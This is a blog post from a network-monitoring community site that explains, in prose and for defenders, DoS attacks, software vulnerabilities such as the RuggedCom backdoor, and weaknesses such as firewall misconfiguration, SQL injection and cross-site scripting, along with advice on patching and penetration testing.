LoveMyTool - Open Community for Network Management and Monitoring

A DoS attack is an attempt to make a service unreachable. The primary impact of DoS is financial. If the company makes money from their website, having the site down will result in loss of revenue. Alternately, if the website is hosted by a Content Distribution Network (CDN) or another provider with sufficient bandwidth and server resources to simply absorb the extra traffic, the resources consumed by the attack will likely result in a very large bill at the end of the month. DoS attacks were historically motivated by Lulz, such as the incident in February 2000 when a Canadian high school student successfully attacked Yahoo, CNN, Amazon, and a few other high-profile sites, knocking them offline. The perpetrator claimed in a 2008 book that the attacks were part of an attempt to establish a reputation for himself and his “cybergang.” Starting in 2008, the Internet vigilante group Anonymous adopted DoS attacks as a form of protest or even punishment against businesses and government agencies. In 2011, several US Government agency websites were attacked, as were content industry organizations such as the RIAA and MPAA, as protest over the SOPA and PIPA bills, as well as the DOJ/FBI raid on the file-sharing site MegaUpload. Ironically, recent research shows that DoS is inexpensive for attackers, available as a service with prices around $5/hour, $40/day, and $900/month. Presumably, these DoS services use botnets – infected PCs – to keep their own costs down. The group Anonymous uses a slightly different method, crowd sourcing their DoS attacks through software they make available for anyone to download. A vulnerability is a flaw in pre-built software. That could be a bug in the OS, a bug in an application, a bug in a middleware package, etc. The key differentiator with a vulnerability is that it’s typically not something the end user or administrator can “fix” themselves. While workarounds are available, the true “fix” will come in the form of a patch from the vendor or supplier. Vulnerabilities are a common vector for attack, because they have a high probability of success across a large number of targets, so the attack can be automated into a Script Kiddie tool or a virus. Security researcher RSnake discovered a vulnerability in the Apache web server, which is very commonly used across the Internet. His proof-of-concept demonstration tool, called Slowloris, has since become a popular tool to perform DoS attacks against those servers. One problem with vulnerabilities is that users must wait for a patch from the vendor, but not all vendors are speedy to create those patches. In April 2012, it was revealed that industrial-control vendor RuggedCom had a serious vulnerability via a forgotten backdoor, which would allow an attacker complete control of the equipment. It was also revealed that the vulnerability had initially been reported to them a full year prior. The announcement came only after the company ignored multiple requests to promise to provide a fix. Although a fix was quickly released, its sudden priority was likely prompted by communication from a large percent of their now angry customer base. Other vendors have taken the opposite approach, actively soliciting information about vulnerabilities in their products by offering cash rewards. Good patch management – timely and thorough – is the best way to reduce your vulnerability target profile for attackers. If an attacker’s automated scan of your network doesn’t return any potential vulnerabilities, you’ve lifted yourself out of the “low hanging fruit” category. For more information on vulnerabilities, or to search a comprehensive list, a good starting point is MITRE’s Common Vulnerabilities and Exposures (CVE) list. 

A weakness is a flaw in implementation of your network and systems. The bad news about weaknesses is that this is the largest category, spanning everything from firewall policies to service architectures to web application coding errors, so it’s unlikely that you’ll be able to find them all. The good news is that there is someone in your organization who can fix them.

 On the network side, a common weakness is mistakes in firewall policies. One example is allowing direct access from the Internet to a database or to Windows Remote Desktop. Those kind of services should at a minimum be protected by VPN and explicit policies specifying which clients should have access to which servers. Even if the services are “hardened” against attack, a newly discovered vulnerability would create risk of a breach. Even worse, firewall policies that allow Internet traffic to reach those sensitive locations will also allow automated scan tools to discover those services, which makes your network more attractive to attack.

 On the server side, weaknesses start with everything on the OWASP Top 10, plus the much larger set on MITRE’s Common Weakness Enumeration (CWE) list.

 The most well known kind of web server weakness is “Injection,” especially SQL Injection. Injection occurs when an attacker is able to pass commands through the application to a back-end. Using input and output validation can usually prevent injection: an application should never trust input from a user, but should always filter it before acting on it.

One common scenario for SQL Injection occurs when the attacker inserts SQL commands into a text field in a web page. If the web application passes that text directly into the database, the database may parse the text and execute the SQL commands. Possible results could be to display a list of all customers, or to delete that list on the database. A more extreme example would be to create a new administrative account, so the attacker has dedicated root privileges and full control. Having escalated themselves to Insiders, the attackers can then launch a new attack deeper into the network from that compromised system.

Injection can also occur with HTML, where it’s referred to as Cross Site Scripting (XSS). On a site vulnerable to XSS, the attacker enters HTML or JavaScript into a text box. When the next user, the victim, views that page, the service displays the “text,” which the browser interprets as a trusted part of the page. This is a common method to steal session cookies, which often lets the attacker control the victim’s account on that site. On Facebook, the result is Lulz. On a banking site, the result is theft.

 Given the range of possibilities for weaknesses, the risk to the business may be substantial, but the effort to find them may be large. A penetration test – commissioning an attack against your own network – is a useful tool to get a sample of what kinds of weaknesses exist, and then start remediating that type of weakness across the network.

 Understanding the Who and the How are key parts of staying one step ahead of potential network security threats. In the final post of this series, we will delve into the Why, discussing the three most common motivations behind cyber attacks.

Author Profile - Jim MacLeod is a Product Manager at WildPackets. He has been in the networking industry since 1994, and started doing protocol analysis in 1996. His experience includes positions in firewall and VPN setup and policy analysis, log management, Internet filtering, anti-spam, intrusion detection, network monitoring and control, and of course packet sniffing.